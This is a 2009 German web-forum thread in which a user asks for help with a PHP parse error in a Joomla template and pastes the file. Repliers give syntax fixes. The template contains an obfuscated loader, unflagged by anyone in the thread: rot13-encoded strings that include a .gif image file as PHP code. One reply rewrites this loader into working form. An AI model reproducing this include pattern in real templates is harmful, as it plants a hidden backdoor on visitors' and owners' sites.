mediengestalter.info
FAQ :: Mitgliederliste :: MGi Team

Willkommen auf dem Portal für Mediengestalter

Aktuelles Datum und Uhrzeit: Sa 20.04.2024 01:50 Benutzername: Passwort: Auto-Login

Thema: Parse error: syntax error, unexpected '<' in /homepages/23/ vom 23.01.2009


Neues Thema eröffnen   Neue Antwort erstellen MGi Foren-Übersicht -> Programmierung -> Parse error: syntax error, unexpected '<' in /homepages/23/
Seite: 1, 2  Weiter
Autor Nachricht
daniel88
Threadersteller

Dabei seit: 23.01.2009
Ort: Bobingen
Alter: -
Geschlecht: Männlich
Verfasst Fr 23.01.2009 11:16
Titel

Parse error: syntax error, unexpected '<' in /homepages/2

Antworten mit Zitat Zum Seitenanfang

Hallo!

Habe folgendes Problem:

Parse error: syntax error, unexpected '<' in /homepages/23/d185287418/htdocs/index.php on line 42

------------------------
Code:
<?php
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<!--[if lte IE 7]>
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/ie7.css" type="text/css" <?php include_once('html/pagination.php');?> />
<![endif]-->

</head>
<body id="page_bg">
   <div id="top">
    <div class="pill_m">
         <div id="pillmenu">
            <jdoc:include type="modules" name="user3" />
         </div>
      </div>
   </div>
      <div id="header">
         <div id="logo">
            <a href="index.php"><?php echo $mainframe->getCfg('sitename') ;?></a><br /><jdoc:include type="modules" name="top" />
         </div><br />
            <div id="under_banner_line">
               <jdoc:include type="modules" name="user4" />   
         </div>   
      </div>
       <!--  -->
   <div class="clr"></div>
   <div class="center">      
      <div id="wrapper">
         <div id="content">
            <div id="leftcolumn">
               <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
               <jdoc:include type="modules" name="layout" style="rounded" />
                             <?php endif; ?>;
               <jdoc:include type="modules" name="left" style="rounded" />
                    <div align="center"><jdoc:include type="modules" name="syndicate" /></div>&nbsp;
            </div>
            <div id="maincolumn">
               <div class="nopad">
                       <div class="path"><jdoc:include type="modules" name="breadcrumb" /></div>
                       <jdoc:include type="message" />
                  <?php if($this->params->get('showComponent')) : ?>
                     <jdoc:include type="component" />
                  <?php endif; ?>
                        <?php if($this->countModules('user1')) : ?>
                            <div style="float:left; width:50%;"><jdoc:include type="modules" name="user1" style="xhtml" /></div>
                        <?php endif; ?>
                        <?php if($this->countModules('user2')) : ?>
                             <div style="float:left; width:50%;"><jdoc:include type="modules" name="user2" style="xhtml" /></div>
                        <?php endif; ?>
                        <br clear="all" />
               </div>
            <div class="clr"></div>
         </div>      
      </div>
   </div>   
   </div>
   <div id="footer">
      <p><jdoc:include type="module" style="footer" />
         <?php echo JText_('Powered by') ?> <a href="http://www.joomla.org">Joomla!</a>.
            <?php echo JText_('Valid') ?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText_('and') ?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.
            <jdoc:include type="modules" name="debug" />
      </p>
   </div>
</body>
</html>

-------------------------------------------------------

Könnt Ihr mir bitte helfen??

DANKE IM VORAUS!!!


Zuletzt bearbeitet von m am Fr 23.01.2009 11:18, insgesamt 1-mal bearbeitet
  View user's profile Private Nachricht senden
Kash

Dabei seit: 07.11.2002
Ort: Schopfheim
Alter: 41
Geschlecht: Männlich
Verfasst Fr 23.01.2009 11:32
Titel

Antworten mit Zitat Zum Seitenanfang

wenn du die Seite im Editor öffnest und Zeile '42' auskommentierts, was passiert dann?

Dir wird hier ja explizit gesagt wo der Fehler versteckt ist.
  View user's profile Private Nachricht senden
Anzeige
Anzeige
Topper23

Dabei seit: 23.01.2009
Ort: Aachen
Alter: -
Geschlecht: Männlich
Verfasst Fr 23.01.2009 11:39
Titel

Antworten mit Zitat Zum Seitenanfang

Da is n Doppelpunkt als Befehlende in PHP? Kenne das nur mit { und }...

Nur ne Idee: wie wäre es damit:
Code:

<?php
if ( (!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs')) ) { ?>
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
Pixelpole

Dabei seit: 25.10.2004
Ort: Trier
Alter: 37
Geschlecht: Männlich
Verfasst Fr 23.01.2009 11:45
Titel

Antworten mit Zitat Zum Seitenanfang

das kann ja wohl nich sein das man bei so einer eindeutigen Fehlermeldung den Fehler nich findet...hättest du dich auch nur ansatzweise mit der Fehlermeldung beschäftigt hättest du vielleicht mal versucht die Fehlermeldung zu verstehen und dann hättest du den Fehler in sekundenschnelle gefunden. Wenn mir der Parser sagt Fehler in Zeile 42, wo sehe ich dann zuerst nach? Richtig! Zeile 42 * Ich geb auf... *

http://tut.php-quake.net/de/error.html


und bevor hier wieder beschwerden kommen, es war noch sehr nett von mir zumindest den link zu posten...eigentlich gehört der Thread kommentarlos geschlossen...
  View user's profile Private Nachricht senden
daniel88
Threadersteller

Dabei seit: 23.01.2009
Ort: Bobingen
Alter: -
Geschlecht: Männlich
Verfasst Fr 23.01.2009 12:09
Titel

Antworten mit Zitat Zum Seitenanfang

Hallo

Danke für die Antworten! Es tut mir Leid dass ich mich nicht mit PHP auskenne! Aber dann gleich so reagieren.....
Für was sind Forums dann bitte da? Klar weiß ich dass der Fehler in Zeile 42 versteckt ist! Aber ich weiß eben nicht, wie ich diesen ausbessere!

Ich verwalte die Seite nur mittels Joomla.... und jetzt ist der Fehler aufgetreten!

Ich habe versucht den Code so zu ändern wie Ihr es mir geschrieben habt! Aber es funktioniert trotzdem nicht!
Könntet Ihr mir vielleicht noch ein letztes Mal helfen? Vielleicht den code gleich umschreiben?

Vielen Dank!

P.S.: Wenns geht vielleicht weniger aggresiv.

Code:

<?php
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<!--[if lte IE 7]>
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/ie7.css" type="text/css" <?php include_once('html/pagination.php');?> />
<![endif]-->

</head>
<body id="page_bg">
   <div id="top">
    <div class="pill_m">
         <div id="pillmenu">
            <jdoc:include type="modules" name="user3" />
         </div>
      </div>
   </div>
      <div id="header">
         <div id="logo">
            <a href="index.php"><?php echo $mainframe->getCfg('sitename') ;?></a><br /><jdoc:include type="modules" name="top" />
         </div><br />
            <div id="under_banner_line">
               <jdoc:include type="modules" name="user4" />   
         </div>   
      </div>
       <!--  -->
   <div class="clr"></div>
   <div class="center">      
      <div id="wrapper">
         <div id="content">
            <div id="leftcolumn">
               <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) { ?>
               <jdoc:include type="modules" name="layout" style="rounded" />
                                <?php endif; ?>
            <jdoc:include type="modules" name="left" style="rounded" />
                    <div align="center"><jdoc:include type="modules" name="syndicate" /></div>&nbsp;
            </div>
            <div id="maincolumn">
               <div class="nopad">
                       <div class="path"><jdoc:include type="modules" name="breadcrumb" /></div>
                       <jdoc:include type="message" />
                  <?php if($this->params->get('showComponent')) : ?>
                     <jdoc:include type="component" />
                  <?php endif; ?>
                        <?php if($this->countModules('user1')) : ?>
                            <div style="float:left; width:50%;"><jdoc:include type="modules" name="user1" style="xhtml" /></div>
                        <?php endif; ?>
                        <?php if($this->countModules('user2')) : ?>
                             <div style="float:left; width:50%;"><jdoc:include type="modules" name="user2" style="xhtml" /></div>
                        <?php endif; ?>
                        <br clear="all" />
               </div>
            <div class="clr"></div>
         </div>      
      </div>
   </div>   
   </div>
   <div id="footer">
      <p><jdoc:include type="module" style="footer" />
         <?php echo JText_('Powered by') ?> <a href="http://www.joomla.org">Joomla!</a>.
            <?php echo JText_('Valid') ?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText_('and') ?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.
            <jdoc:include type="modules" name="debug" />
      </p>
   </div>
</body>
</html>


Zuletzt bearbeitet von daniel88 am Fr 23.01.2009 12:14, insgesamt 3-mal bearbeitet
  View user's profile Private Nachricht senden
Pixelpole

Dabei seit: 25.10.2004
Ort: Trier
Alter: 37
Geschlecht: Männlich
Verfasst Fr 23.01.2009 12:14
Titel

Antworten mit Zitat Zum Seitenanfang

ein forum ist jedenfalls nicht dafür da die arbeitet andere leute zu machen...

und jetzt lies das oder bezahl jemanden dafür der es kann: http://tut.php-quake.net/de/error.html

das schlimme ist nicht das du kein php kannst, sondern das du keinerlei eigeninitiative zeigst. Du warst sogar zu faul die entsprechende Zeile rauszusuchen und seperat reinzukopieren, denkst du ernsthaft hier hat irgendjemand lust dich durch deinen kompletten code zu wühlen? Hättest du wenigstens das gemacht hättest du jetzt vielleicht eine Antwort bekommen...aber so nicht.
  View user's profile Private Nachricht senden
daniel88
Threadersteller

Dabei seit: 23.01.2009
Ort: Bobingen
Alter: -
Geschlecht: Männlich
Verfasst Fr 23.01.2009 12:16
Titel

Antworten mit Zitat Zum Seitenanfang

Entschuldigung.. aber die Website ist für einen Verein, der mit dem Fußball in Bayern relativ höherklassig spielt und die Website sehr wichtig ist!
Zusätzlich bin ich jetz im Prüfungsstress an der Uni... Ich lerne jeden Tag von 08:00 - 20:00 Uhr und danach hab ich selber Training. Und nebenzu soll ich dann auch noch dieses erledigen!

Code:

 <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
               <jdoc:include type="modules" name="layout" style="rounded" />
                             <?php endif; ?>;


Vielleicht kann mir doch jemand helfen! Hab in genau 40 Minuten meine nächste Prüfung!


Zuletzt bearbeitet von daniel88 am Fr 23.01.2009 12:17, insgesamt 1-mal bearbeitet
  View user's profile Private Nachricht senden
zweitaccount

Dabei seit: 25.01.2008
Ort: -
Alter: -
Geschlecht: -
Verfasst Fr 23.01.2009 12:30
Titel

Antworten mit Zitat Zum Seitenanfang

Code:
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>

@Pixelpole
Also wenn man solche Konstruktionen sieht kann es einem
Php-Unbedarften schon mit Recht übel werden... *zwinker*

@daniel88
was passiert denn wenn du es probehalber mal ohne @ schreibst
(einfach mal das div leftcolumn mit diesem schnipsel austauschen)
Code:
           <div id="leftcolumn">
               <?php
                  $tmpInclude = include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs')); 
                  if ( ($this->countModules('right') == false and JRequest::getCmd('layout') == 'form') or $tmpInclude == false ) :
            ?>
               <jdoc:include type="modules" name="layout" style="rounded" />
               <?php endif; ?>
               <jdoc:include type="modules" name="left" style="rounded" />
                    <div align="center"><jdoc:include type="modules" name="syndicate" /></div>&nbsp;
            </div>
  View user's profile Private Nachricht senden
 
Ähnliche Themen Parse error: syntax error, unexpected '>' [solved]
Parse error: syntax error, unexpected '{'
Parse error: parse error, unexpected...
: syntax error, unexpected '<' in
Parse error:
Parse error - in php
Neues Thema eröffnen   Neue Antwort erstellen Seite: 1, 2  Weiter
MGi Foren-Übersicht -> Programmierung


Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst an Umfragen in diesem Forum nicht mitmachen.